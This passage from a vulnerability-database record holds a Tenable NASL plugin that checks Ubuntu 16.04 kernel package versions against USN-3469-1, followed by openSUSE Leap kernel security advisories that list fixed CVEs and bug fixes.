Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104320);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12192\", \"CVE-2017-14051\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\", \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\");\n script_xref(name:\"USN\", value:\"3469-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux, linux-aws, linux-gke, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities (USN-3469-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Anthony Perard discovered that the Xen virtual block driver did not\nproperly initialize some data structures before passing them to user\nspace. A local attacker in a guest VM could use this to expose\nsensitive information from the host OS or other guest VMs.\n(CVE-2017-10911)\n\nBo Zhang discovered that the netlink wireless configuration interface\nin the Linux kernel did not properly validate attributes when handling\ncertain requests. A local attacker with the CAP_NET_ADMIN could use\nthis to cause a denial of service (system crash). (CVE-2017-12153)\n\nIt was discovered that the nested KVM implementation in the Linux\nkernel in some situations did not properly prevent second level guests\nfrom reading and writing the hardware CR8 register. A local attacker\nin a guest could use this to cause a denial of service (system crash).\n\nIt was discovered that the key management subsystem in the Linux\nkernel did not properly restrict key reads on negatively instantiated\nkeys. 
A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-12192)\n\nIt was discovered that an integer overflow existed in the sysfs\ninterface for the QLogic 24xx+ series SCSI driver in the Linux kernel.\nA local privileged attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-14051)\n\nIt was discovered that the ATI Radeon framebuffer driver in the Linux\nkernel did not properly initialize a data structure returned to user\nspace. A local attacker could use this to expose sensitive information\n(kernel memory). (CVE-2017-14156)\n\nDave Chinner discovered that the XFS filesystem did not enforce that\nthe realtime inode flag was settable only on filesystems on a realtime\ndevice. A local attacker could use this to cause a denial of service\n(system crash). (CVE-2017-14340)\n\nChunYu Wang discovered that the iSCSI transport implementation in the\nLinux kernel did not properly validate data structures. A local\nattacker could use this to cause a denial of service (system crash).\n(CVE-2017-14489)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did\nnot properly initialize data returned to user space in some\nsituations. A local attacker could use this to expose sensitive\ninformation (kernel memory). (CVE-2017-14991)\n\nDmitry Vyukov discovered that the Floating Point Unit (fpu) subsystem\nin the Linux kernel did not properly handle attempts to set reserved\nbits in a task's extended state (xstate) area. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2017-15537)\n\nPengfei Wang discovered that the Turtle Beach MultiSound audio device\ndriver in the Linux kernel contained race conditions when fetching\nfrom the ring-buffer. A local attacker could use this to cause a\ndenial of service (infinite loop). 
(CVE-2017-9984, CVE-2017-9985).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3469-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! 
preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12192\", \"CVE-2017-14051\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\", \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3469-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1009-kvm\", pkgver:\"4.4.0-1009.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1033-gke\", pkgver:\"4.4.0-1033.33\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1039-aws\", pkgver:\"4.4.0-1039.48\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1076-raspi2\", pkgver:\"4.4.0-1076.84\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1078-snapdragon\", pkgver:\"4.4.0-1078.83\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-98-generic\", pkgver:\"4.4.0-98.121\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-98-generic-lpae\", pkgver:\"4.4.0-98.121\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-98-lowlatency\", pkgver:\"4.4.0-98.121\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1039.41\")) flag++;\nif (ubuntu_check(osver:\"16.04\", 
pkgname:\"linux-image-generic\", pkgver:\"4.4.0.98.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.4.0.98.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.4.0.1033.34\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.4.0.1009.9\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.98.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.4.0.1076.76\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.4.0.1078.70\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-10-17T18:10:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "description": "The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in 
net/wireless/nl80211.c in the Linux\n kernel. This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the "CR8-load exiting" and "CR8-store\n exiting" L0 vmcs02 controls exist in cases where L1 omits the "use TPR\n shadow" vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - blacklist.conf: Add commit b5accbb0dfae\n - blacklist.conf: add one more\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to 
btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo 
in fib6_net_exit() (bnc#1012382).\n - kabi/severities: ignore nfs_pgio_data_destroy\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both\n infinite inputs (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values\n with opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both\n inputs zero (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN\n propagation (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs\n negative (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero\n inputs (bnc#1012382).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - nfsd: Fix general protection fault in 
release_lock_stateid()\n (bnc#1012382).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - scsi: ILLEGAL REQUEST + ASC==27 => target failure (bsc#1059465).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: 
zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - xfs/dmapi: fix incorrect file->f_path.dentry->d_inode usage\n (bsc#1055896).\n\n", "edition": 1, "modified": "2017-10-17T15:09:40", "published": "2017-10-17T15:09:40", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00018.html", "id": "OPENSUSE-SU-2017:2739-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-17T18:10:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "description": "The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. 
This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the "CR8-load exiting" and "CR8-store\n exiting" L0 vmcs02 controls exist in cases where L1 omits the "use TPR\n shadow" vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: release 
auth_key.response for reconnect (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - drivers: net: phy: xgene: Fix mdio write (bsc#1057383).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - efi/fb: Avoid reconfiguration of BAR that covers the framebuffer\n (bsc#1051987).\n - efi/fb: Correct PCI_STD_RESOURCE_END usage (bsc#1051987).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in 
fib6_net_exit() (bnc#1012382).\n - iw_cxgb4: put ep reference in pass_accept_req() (fate#321658 bsc#1005778\n fate#321660 bsc#1005780 fate#321661 bsc#1005781).\n - KABI fix drivers/nvme/target/nvmet.h (bsc#1058550).\n - kabi/severities: ignore nfs_pgio_data_destroy\n - kABI: Workaround kABI breakage of AMD-AVIC fixes (bsc#1044503).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: Add struct kvm_vcpu pointer parameter to get_enable_apicv()\n (bsc#1044503).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: SVM: Add irqchip_split() checks before enabling AVIC (bsc#1044503).\n - kvm: SVM: delete avic_vm_id_bitmap (2 megabyte static array)\n (bsc#1059500).\n - kvm: SVM: Refactor AVIC vcpu initialization into avic_init_vcpu()\n (bsc#1044503).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n 
opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nvme-fabrics: generate spec-compliant UUID NQNs (bsc#1057498).\n - nvmet: Move serial number from controller to subsystem (bsc#1058550).\n - nvmet: preserve controller serial number between reboots (bsc#1058550).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n 